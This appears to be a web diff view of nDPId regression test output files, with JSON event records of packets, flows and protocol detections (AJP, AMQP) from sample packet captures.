00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584448}
00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"}
00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618}
00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618}
00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="}
00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618}
@@ -34,8 +34,8 @@
01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"}
00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618}
00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1505154584618}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 38/26

1668
test/results/alexa-app.pcapng.out
View File

File diff suppressed because it is too large Load Diff

36
test/results/amqp.pcap.out
View File

@@ -1,23 +1,23 @@
00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"amqp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1490904166118}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"}
00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQRAAEAGOP5\/AAEBfwAAARYorKyekqFfoHNnjIAYAXcA6QAAAQEICgC+1cIAvtPXAQADAAAAKQA8ADwBMwAAAAAAAGF2AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNSwgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjYuMTE4NTgzLCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAA0HMNAAEAGHv9\/AAABfwABAaysFiigc2eMnpKjH4AQDjX\/KAAAAQEICgC+1cIAvtXC"}
01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"}
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
